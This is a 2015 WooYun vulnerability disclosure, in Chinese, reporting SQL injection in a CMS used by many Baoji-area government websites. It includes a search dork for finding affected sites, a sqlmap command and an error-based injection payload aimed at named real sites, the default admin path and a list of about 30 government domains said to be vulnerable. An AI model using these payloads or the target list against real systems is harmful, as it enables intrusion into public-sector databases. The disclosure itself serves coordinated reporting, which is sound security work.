当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093957

漏洞标题:某网络公司开发的政务类CMS存在通用SQL注入漏洞

相关厂商:宝鸡市世纪网络技术有限公司

漏洞作者: onpu

提交时间:2015-01-29 18:29

修复时间:2015-04-29 18:30

公开时间:2015-04-29 18:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-29: 细节已通知厂商并且等待厂商处理中
2015-02-03: 厂商已经确认,细节仅向厂商公开
2015-02-06: 细节向第三方安全合作伙伴开放
2015-03-30: 细节向核心白帽子及相关领域专家公开
2015-04-09: 细节向普通白帽子公开
2015-04-19: 细节向实习白帽子公开
2015-04-29: 细节向公众公开

简要描述:

某网络公司开发的政务类CMS存在通用SQL注入漏洞

详细说明:

由宝鸡市世纪网络技术有限公司(http://www.bjsjwl.com)开发的某套CMS程序用于宝鸡市区多数政府网站,存在通用的sql注入。
关键字:"技术支持:宝鸡市世纪网络技术有限公司" inurl:stage.php?do=

8.png

漏洞证明:

存在缺陷文件:
stage.php、show_top.php、infor.php等
注入参数:cid、upid、wid等


网站的url进过改写的,改写成的类型为:infor.php?+参数,而不是stage.php?do=的类型,进行了更换后,正常显示,说明存在sql注入


格式:url改写:http://127.0.0.1/infor.php?xxx
原来:http://127.0.0.1/stage.php?do=votelist&cid=1


以下就是举栗子
警告:以下栗子是为了证明通用型,也给CNVD进行测试,勿用于非法用途或破坏,后果自负,谢谢。
由于使用了注入过滤,无法直接注入,只能是进行中转注入
用法如:

sqlmap.py -u "http://www.bjgqt.com/love/stage.php?do=wishdo" --cookie "wid=42" --level 2


http://www.bjgqt.com/love/stage.php?do=wishdo&wid=42
http://www.bjzfgjj.com/stage.php?do=msgshow&id=3941
http://www.weibin.gov.cn/show_top.php?upid=NSFTW
http://mxcxjb.com/stage.php?do=votelist&cid=26
http://www.bjjtjy.com/stage.php?do=msglistsum&fid=1
http://www.lxczw.gov.cn/stage.php?do=voteinfor&cid=8
http://www.bjqx.gov.cn/flashnews.php?fid=(select%201%20and%20row(1%2c1)>(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(98)%2cCHAR(54)%2cCHAR(109)%2cCHAR(113)%2cCHAR(88)%2cCHAR(71)%2cCHAR(76)%2cCHAR(50))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&h=180&len=32&num=8&w=260


默认后台地址:网站url+/temple/

QQ图片20150126003907.png


在浏览网站的时候发现,网站的url默认的页面是:网站+/infor.php,如:

QQ图片20150126004113.png


只要我们在infor.php加上?/ 就是爆出网站的当前用户和数据库名词,如:

QQ图片20150126004558.png


其中前面的七位数就是数据库名称,而在后面加@%,就是当前用户。

http://www.bjgqt.com/love/stage.php?do=wishdo&wid=42


QQ图片20150126005502.png


QQ图片20150126005546.png


QQ图片20150126005612.png


http://www.bjzfgjj.com/stage.php?do=msgshow&id=3941


QQ图片20150126005924.png


http://www.weibin.gov.cn/show_top.php?upid=NSFTW


QQ图片20150126010101.png


http://mxcxjb.com/stage.php?do=votelist&cid=26


QQ图片20150126013814.png


http://www.bjjtjy.com/stage.php?do=msglistsum&fid=1


QQ图片20150126022437.png


url改写的:http://www.lxczw.gov.cn/infor.php?756,无法正常sql注入,可换会原来的类,http://www.lxczw.gov.cn/stage.php?do=voteinfor&cid=8,这样就可以注入了。

QQ图片20150126022931.png


存在sql注入的网站:
http://www.nanzhihui.gov.cn/ 凤翔县南指挥镇人民政府
http://www.ccqzfw.gov.cn/ 中共宝鸡市陈仓区委政法委员会
http://www.sxfxcz.gov.cn 凤县财政局
http://www.bjssyj.com  宝鸡市兽医局
http://www.ccqzfw.gov.cn  中共宝鸡市陈仓区委政法委员会
http://www.sxfx.gov.cn 凤县扶贫开发
http://www.sxfx.gov.cn/ 凤县卫生局
http://www.qyxsfw.com 千阳县书法协会
http://www.qyjjw.gov.cn 千阳县纪律检查委员会
http://www.qyjcy.gov.cn 千阳县检察院
http://bjcjp.gov.cn 陕西省蔡家坡经济技术开发区管理委员会
http://www.bjjtjy.com 宝鸡市金台区教育体育局
http://www.jtgafj.gov.cn/ 宝鸡市公安局金台分局
http://fengxiangzf.gov.cn/中共凤翔县委政法委员会
http://www.wbxfj.com/ 渭滨区信访局
http://www.jtcz.gov.cn/ 金台区财政局
http://www.jtzj.gov.cn/金台区住房和城乡建设局(地震局)
http://www.baojiwenguang.gov.cn 宝鸡市文化广电新闻出版局
http://www.sxtb.gov.cn/ 太白县人民政府
http://www.lyxxfj.com/麟游县信访局
http://www.ccjcy.gov.cn/ 宝鸡市陈仓区人民检察院
http://fxxf.gov.cn/ 凤县信访局
http://www.fengxiang.gov.cn/ 中共凤翔县政府
http://www.bjdpc.gov.cn/ 宝鸡市发展和改革委员会
http://www.bjzfgjj.com/ 宝鸡市公积金管理中心
http://weibin.gov.cn/ 渭滨区政府 
http://www.sxfx.gov.cn/ 凤县人民政府
http://www.fxjjw.gov.cn/ 凤县纪检监察网
http://www.qianyang.gov.cn/ 千阳县人民政府
http://sxfx.gov.cn/ 凤县人民政府
http://www.lxkjxx.gov.cn/ 陇县科技局网站
http://www.qyjjw.gov.cn/ 千阳纪检监察网
http://www.fxxpop.gov.cn/ 凤翔县人口和计划生育局
http://www.bjqx.gov.cn/ 宝鸡市气象局

修复方案:

修改缺陷文件,加强过滤。

版权声明:转载请注明来源 onpu@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-02-03 14:52

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给陕西分中心,由其后续协调网站管理单位处置。

最新状态:

暂无